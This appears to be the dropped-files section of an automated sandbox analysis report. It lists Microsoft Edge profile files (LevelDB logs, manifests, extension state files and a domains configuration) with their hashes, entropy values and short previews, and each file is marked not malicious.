                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.181042053938107
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5CJ1923oH+Tcwtk2WwnvB2KLlrCbFFlL+q2P923oH+Tcwtk2WwnvIFUv:ZYebkxwnvFLiOv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                          MD5:C41C4B59DA142407AB7EEEAAC8B81F9E
                                                                                                                                                                                                                                                                                          SHA1:B412E47B9FFA9F0727814DCFBFD928EB39971169
                                                                                                                                                                                                                                                                                          SHA-256:4553D04C1D4F88663F9A327F38507E777C752097C1517C8F139B2272EFBEC880
                                                                                                                                                                                                                                                                                          SHA-512:62F8840E988333CC757B016507F700ABCAB738EA5EED3C7CB596CB7D8B866DB018FD3B114CB2F0B5470956071EC5B687C6A294204B7088056098174E7708AA5D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.549 1e58 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/31-10:59:22.795 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.32461666648912
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RO:C1gAg1zfv2
                                                                                                                                                                                                                                                                                          MD5:AA5884DB0F34133A4791A9B57055456D
                                                                                                                                                                                                                                                                                          SHA1:7DD4B084A0494EE076A1FA55B9AB8D81EA2D87BA
                                                                                                                                                                                                                                                                                          SHA-256:BEE89DE07AB576A9A2F11947FDB8F8101A8F66B4F763F2C99D05AF1ABAEF8E51
                                                                                                                                                                                                                                                                                          SHA-512:1067CCD5F1294BBED941CE3DBD7533B9298DD60B2864813990568FBF4C5FF1E37645DC1AE2F3DE2256E2C96A600120DDD1683555DE5065FD0B9E10AF0B9638A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.180033312901054
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5LSVq2P923oH+Tcwt8aPrqIFUt8M5gZmw+M5IkwO923oH+Tcwt8amLJ:dOv4YebL3FUt8p/+j5LYebQJ
                                                                                                                                                                                                                                                                                          MD5:C07198273690631854510E51A2DCDEAA
                                                                                                                                                                                                                                                                                          SHA1:769FFE4592039052188964B4D5EB3336C670C523
                                                                                                                                                                                                                                                                                          SHA-256:54170AD53FA8B75D0ACE76115CE9DECD00C7CC9EC8F12CE75DD312F0B65FA716
                                                                                                                                                                                                                                                                                          SHA-512:9AA3D89F1E56D65D509C9EB5671A817CD9971EC2740E7B07DE00310DB75EE71DAF8E96678DBA85A7248E35192FA1735EB75188CB8B0C1D05BBEB91647305AEAF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.162 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/31-10:59:17.163 6f0 Recovering log #3.2024/12/31-10:59:17.163 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.180033312901054
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5LSVq2P923oH+Tcwt8aPrqIFUt8M5gZmw+M5IkwO923oH+Tcwt8amLJ:dOv4YebL3FUt8p/+j5LYebQJ
                                                                                                                                                                                                                                                                                          MD5:C07198273690631854510E51A2DCDEAA
                                                                                                                                                                                                                                                                                          SHA1:769FFE4592039052188964B4D5EB3336C670C523
                                                                                                                                                                                                                                                                                          SHA-256:54170AD53FA8B75D0ACE76115CE9DECD00C7CC9EC8F12CE75DD312F0B65FA716
                                                                                                                                                                                                                                                                                          SHA-512:9AA3D89F1E56D65D509C9EB5671A817CD9971EC2740E7B07DE00310DB75EE71DAF8E96678DBA85A7248E35192FA1735EB75188CB8B0C1D05BBEB91647305AEAF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.162 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/31-10:59:17.163 6f0 Recovering log #3.2024/12/31-10:59:17.163 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.193205791405241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OEwVq2P923oH+Tcwt865IFUt8MOVSgZmw+MNtSIkwO923oH+Tcwt86+ULJ:k9v4Yeb/WFUt8FX/+8tF5LYeb/+SJ
                                                                                                                                                                                                                                                                                          MD5:B7A263E76BD88E63FB20298F25D9648D
                                                                                                                                                                                                                                                                                          SHA1:01509CE4D6AB21E3293A02554F1BA002C0C1402B
                                                                                                                                                                                                                                                                                          SHA-256:C62668EC61E0364C9AB51AB2A93DC460F3F7DD40A51D87A2E4C39DCAF5863641
                                                                                                                                                                                                                                                                                          SHA-512:7F915683F14A00A08CDC347F34F71D275BC161FC85AEDFDCF498BEE50B19F2DCCAE86032E6363268126004BDE9CD249FB27CFA1882B430671F178FF67B4BE653
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.225 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/31-10:59:17.350 6f0 Recovering log #3.2024/12/31-10:59:17.351 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.193205791405241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OEwVq2P923oH+Tcwt865IFUt8MOVSgZmw+MNtSIkwO923oH+Tcwt86+ULJ:k9v4Yeb/WFUt8FX/+8tF5LYeb/+SJ
                                                                                                                                                                                                                                                                                          MD5:B7A263E76BD88E63FB20298F25D9648D
                                                                                                                                                                                                                                                                                          SHA1:01509CE4D6AB21E3293A02554F1BA002C0C1402B
                                                                                                                                                                                                                                                                                          SHA-256:C62668EC61E0364C9AB51AB2A93DC460F3F7DD40A51D87A2E4C39DCAF5863641
                                                                                                                                                                                                                                                                                          SHA-512:7F915683F14A00A08CDC347F34F71D275BC161FC85AEDFDCF498BEE50B19F2DCCAE86032E6363268126004BDE9CD249FB27CFA1882B430671F178FF67B4BE653
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.225 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/31-10:59:17.350 6f0 Recovering log #3.2024/12/31-10:59:17.351 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.209683409106696
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OOGqM+q2P923oH+Tcwt8NIFUt8MOOGXZmw+MOOGqMVkwO923oH+Tcwt8+eLJ:8OpM+v4YebpFUt8DOm/+DOpMV5LYebqJ
                                                                                                                                                                                                                                                                                          MD5:9A93FE28170897CC05ABC7D49B9F87E7
                                                                                                                                                                                                                                                                                          SHA1:ABA5C6C6F75791CA39C2E725F0EFD83B5866DF97
                                                                                                                                                                                                                                                                                          SHA-256:DA1D41EB2A5F515D98D3C91B2A25E5E29D3A3B0FC11E3A6FC2599A1E2BBCDE0D
                                                                                                                                                                                                                                                                                          SHA-512:06DCBF8CA5A97C8775A1182FB9B7B6C10FA50930762C856ADFD6BEE0226FA0BA3F760BF1048A7CEE8F666C5EEC0A795594E5084E559EF2F87A805B484B768B08
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.849 dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/31-10:59:17.849 dfc Recovering log #3.2024/12/31-10:59:17.849 dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.209683409106696
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OOGqM+q2P923oH+Tcwt8NIFUt8MOOGXZmw+MOOGqMVkwO923oH+Tcwt8+eLJ:8OpM+v4YebpFUt8DOm/+DOpMV5LYebqJ
                                                                                                                                                                                                                                                                                          MD5:9A93FE28170897CC05ABC7D49B9F87E7
                                                                                                                                                                                                                                                                                          SHA1:ABA5C6C6F75791CA39C2E725F0EFD83B5866DF97
                                                                                                                                                                                                                                                                                          SHA-256:DA1D41EB2A5F515D98D3C91B2A25E5E29D3A3B0FC11E3A6FC2599A1E2BBCDE0D
                                                                                                                                                                                                                                                                                          SHA-512:06DCBF8CA5A97C8775A1182FB9B7B6C10FA50930762C856ADFD6BEE0226FA0BA3F760BF1048A7CEE8F666C5EEC0A795594E5084E559EF2F87A805B484B768B08
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.849 dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/31-10:59:17.849 dfc Recovering log #3.2024/12/31-10:59:17.849 dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):405
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.23852408459796
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tAv4Yeb8rcHEZrELFUt85/+T5LYeb8rcHEZrEZSJ:M4Yeb8nZrExg8sLYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:97B04CEFA23793409B775A7E7B459C9D
                                                                                                                                                                                                                                                                                          SHA1:DDA497198C470AED63232FFCDB3036E77EC5B14F
                                                                                                                                                                                                                                                                                          SHA-256:B7F1C86BB1BDE05F96F886632138C3319B6BB696112FE77BF26A539843867EF6
                                                                                                                                                                                                                                                                                          SHA-512:029E63621B139CC77F44582B452F45BF0D9831CD51BEEB3093F0D3E35B819305AA8B0652373839314A5C126371516DA14945B437BABAB99E1A56DE2FED9BE347
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.211 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/31-10:59:21.212 6f0 Recovering log #3.2024/12/31-10:59:21.212 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):405
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.23852408459796
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tAv4Yeb8rcHEZrELFUt85/+T5LYeb8rcHEZrEZSJ:M4Yeb8nZrExg8sLYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:97B04CEFA23793409B775A7E7B459C9D
                                                                                                                                                                                                                                                                                          SHA1:DDA497198C470AED63232FFCDB3036E77EC5B14F
                                                                                                                                                                                                                                                                                          SHA-256:B7F1C86BB1BDE05F96F886632138C3319B6BB696112FE77BF26A539843867EF6
                                                                                                                                                                                                                                                                                          SHA-512:029E63621B139CC77F44582B452F45BF0D9831CD51BEEB3093F0D3E35B819305AA8B0652373839314A5C126371516DA14945B437BABAB99E1A56DE2FED9BE347
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.211 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/31-10:59:21.212 6f0 Recovering log #3.2024/12/31-10:59:21.212 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1041
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.589933362341737
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:3TlW15aYM9a7lPP/3C9Yn5R8W78/WmEFW14YOzHb6q0OSmElMRE8+RqIeureF33R:3ZW+clP3CM5RomFXZNrWpV03y1x4uMyG
                                                                                                                                                                                                                                                                                          MD5:095282087B6C2FFCE0BEFA24A35E1149
